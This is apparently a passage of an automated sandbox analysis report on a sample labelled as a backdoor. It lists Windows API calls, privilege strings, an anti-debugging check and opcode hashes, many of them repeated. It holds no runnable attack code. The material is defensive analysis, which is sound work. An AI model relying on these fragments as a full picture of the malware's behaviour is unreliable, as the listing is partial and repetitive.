                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: fa28cde91e88cd307c6ad3a34c807ac378978038c9d7ab74a14d115b04f84674
                                                • Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
                                                • Opcode Fuzzy Hash: fa28cde91e88cd307c6ad3a34c807ac378978038c9d7ab74a14d115b04f84674
                                                • Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: dadb937219916bc1d3e5d21d7fa51c6a2d396a0a855ec119f2a8041773ddc361
                                                • Instruction ID: fa24951a9b4b354147c67fb74aec9b929b94bd46ae4666a4b334078811ee299f
                                                • Opcode Fuzzy Hash: dadb937219916bc1d3e5d21d7fa51c6a2d396a0a855ec119f2a8041773ddc361
                                                • Instruction Fuzzy Hash: 2FA0029556E542BC715C61526D16D7A021CD4C8B913304919B516D51E165886D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 5d3c55b96889eb444bfed2b968885ef95332c0a40c9bc79a3a539b6fd361a3d5
                                                • Instruction ID: fa24951a9b4b354147c67fb74aec9b929b94bd46ae4666a4b334078811ee299f
                                                • Opcode Fuzzy Hash: 5d3c55b96889eb444bfed2b968885ef95332c0a40c9bc79a3a539b6fd361a3d5
                                                • Instruction Fuzzy Hash: 2FA0029556E542BC715C61526D16D7A021CD4C8B913304919B516D51E165886D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: f04bdc5753f7194f1b1b63d738d5dd938bcc076351859d20bebf3736ed76f18b
                                                • Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
                                                • Opcode Fuzzy Hash: f04bdc5753f7194f1b1b63d738d5dd938bcc076351859d20bebf3736ed76f18b
                                                • Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: b5ca027b925a0d614f431fa2f0b97bca9aa2e5eb8ce4742d0aee5092b1ddd5b8
                                                • Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
                                                • Opcode Fuzzy Hash: b5ca027b925a0d614f431fa2f0b97bca9aa2e5eb8ce4742d0aee5092b1ddd5b8
                                                • Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 4fd46c6b951373a66a25dac6d47a17bb49fcfed1270b70bbd84aebd0356c2d9f
                                                • Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
                                                • Opcode Fuzzy Hash: 4fd46c6b951373a66a25dac6d47a17bb49fcfed1270b70bbd84aebd0356c2d9f
                                                • Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetCurrentDirectoryW.KERNELBASE(?,007EA587,C:\Users\user\Desktop,00000000,0081946A,00000006), ref: 007EA326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 783798438ce70992c56e6a77dc07935356841710f97f8f5271169dc59d45d5a1
                                                • Instruction ID: e869fe9227bd6450d92bd79c9cb6343b861e759be87af56ba5686608b3c45581
                                                • Opcode Fuzzy Hash: 783798438ce70992c56e6a77dc07935356841710f97f8f5271169dc59d45d5a1
                                                • Instruction Fuzzy Hash: 7EA0123019400656CB000B30CC0AC1576546760702F0086207002C00A0CB30C814A500
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 007EB971
                                                • EndDialog.USER32(?,00000006), ref: 007EB984
                                                • GetDlgItem.USER32(?,0000006C), ref: 007EB9A0
                                                • SetFocus.USER32(00000000), ref: 007EB9A7
                                                • SetDlgItemTextW.USER32(?,00000065,?), ref: 007EB9E1
                                                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 007EBA18
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007EBA2E
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007EBA4C
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007EBA5C
                                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007EBA78
                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007EBA94
                                                • _swprintf.LIBCMT ref: 007EBAC4
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 007EBAD7
                                                • FindClose.KERNEL32(00000000), ref: 007EBADE
                                                • _swprintf.LIBCMT ref: 007EBB37
                                                • SetDlgItemTextW.USER32(?,00000068,?), ref: 007EBB4A
                                                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 007EBB67
                                                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 007EBB87
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007EBB97
                                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007EBBB1
                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007EBBC9
                                                • _swprintf.LIBCMT ref: 007EBBF5
                                                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 007EBC08
                                                • _swprintf.LIBCMT ref: 007EBC5C
                                                • SetDlgItemTextW.USER32(?,00000069,?), ref: 007EBC6F
                                                  • Part of subcall function 007EA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007EA662
                                                  • Part of subcall function 007EA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0080E600,?,?), ref: 007EA6B1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                • API String ID: 797121971-1840816070
                                                • Opcode ID: b8a4b5d38ee2b382e894a69e631d90f9903cfd43e8dbd71e1e2430779bf046bf
                                                • Instruction ID: d8f8dbf3309a1ec7e5eab4a8dd87abdc3465fcdaf8afe5c0f4bd5678c3100fea
                                                • Opcode Fuzzy Hash: b8a4b5d38ee2b382e894a69e631d90f9903cfd43e8dbd71e1e2430779bf046bf
                                                • Instruction Fuzzy Hash: 709185B2249348FBD7219BA1DD49FFB7BACFB8D700F040819B745D2191DB79AA048762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D7191
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 007D72F1
                                                • CloseHandle.KERNEL32(00000000), ref: 007D7301
                                                  • Part of subcall function 007D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 007D7C04
                                                  • Part of subcall function 007D7BF5: GetLastError.KERNEL32 ref: 007D7C4A
                                                  • Part of subcall function 007D7BF5: CloseHandle.KERNEL32(?), ref: 007D7C59
                                                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 007D730C
                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 007D741A
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 007D7446
                                                • CloseHandle.KERNEL32(?), ref: 007D7457
                                                • GetLastError.KERNEL32 ref: 007D7467
                                                • RemoveDirectoryW.KERNEL32(?), ref: 007D74B3
                                                • DeleteFileW.KERNEL32(?), ref: 007D74DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                • API String ID: 3935142422-3508440684
                                                • Opcode ID: dc1b60c41d2b8571715a8636daaa072348cd5a662b77e6cc762855c947991e43
                                                • Instruction ID: 72fbe7695bf8098c0a8ea4c56c5a01a835b4c24e946a5c4b8c997c36e0b44b86
                                                • Opcode Fuzzy Hash: dc1b60c41d2b8571715a8636daaa072348cd5a662b77e6cc762855c947991e43
                                                • Instruction Fuzzy Hash: A6B1E371904259EBDF25DFA4DC45BEE7B78BF04300F04446AFA49E7242E738AA49CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog_memcmp
                                                • String ID: CMT$h%u$hc%u
                                                • API String ID: 3004599000-3282847064
                                                • Opcode ID: c86ea2cf3c1627661000ec8bab177781d639a0b7e240c60c2c7b49bd69712c5c
                                                • Instruction ID: 185f6e7bb68298668581e827d919f4b5126d6e54bb3b7578acd653c97e720e6c
                                                • Opcode Fuzzy Hash: c86ea2cf3c1627661000ec8bab177781d639a0b7e240c60c2c7b49bd69712c5c
                                                • Instruction Fuzzy Hash: 1A32A0716102849FDF15DF64C899AEA37B5AF54300F04457FFD8A8B382DB78AA48CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 9480b2ef86b08d6c2d81b9a24a43f0c24a44e9ee83935b804c234251bd29e35f
                                                • Instruction ID: 7aced4c6856e8d3a1ed1e367638ca9d7393dc4e0a7334af4f191abb8f8dc0995
                                                • Opcode Fuzzy Hash: 9480b2ef86b08d6c2d81b9a24a43f0c24a44e9ee83935b804c234251bd29e35f
                                                • Instruction Fuzzy Hash: 21C22872E0862C8BDB35CE289D447EAB7B6EB44315F1541EAD90DE7340E779AE818F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D27F1
                                                • _strlen.LIBCMT ref: 007D2D7F
                                                  • Part of subcall function 007E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007DB652,00000000,?,?,?,0001041A), ref: 007E1396
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D2EE0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                • String ID: CMT
                                                • API String ID: 1706572503-2756464174
                                                • Opcode ID: 5533da91bc08dfb6f4208fca4c11b09f5e2813fca15b7c5a1e980e07db6b7330
                                                • Instruction ID: b6f2c6eeb821de19f0e03bd65b57979b501e8699a528d7c518e74c519c73e8e9
                                                • Opcode Fuzzy Hash: 5533da91bc08dfb6f4208fca4c11b09f5e2813fca15b7c5a1e980e07db6b7330
                                                • Instruction Fuzzy Hash: 7C62D371504244CFDF19DF64C8996EA3BF1AF64300F18457FED9A8B382DA78A946CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007F8767
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007F8771
                                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 007F877E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: a1490598ca9bd5d016692bdd55a104cc3e87730bef86a570e03a20a85b5f1259
                                                • Instruction ID: 495901196befa75b25181bb2272864d10f583ffa41243881225a98bd8ff2824d
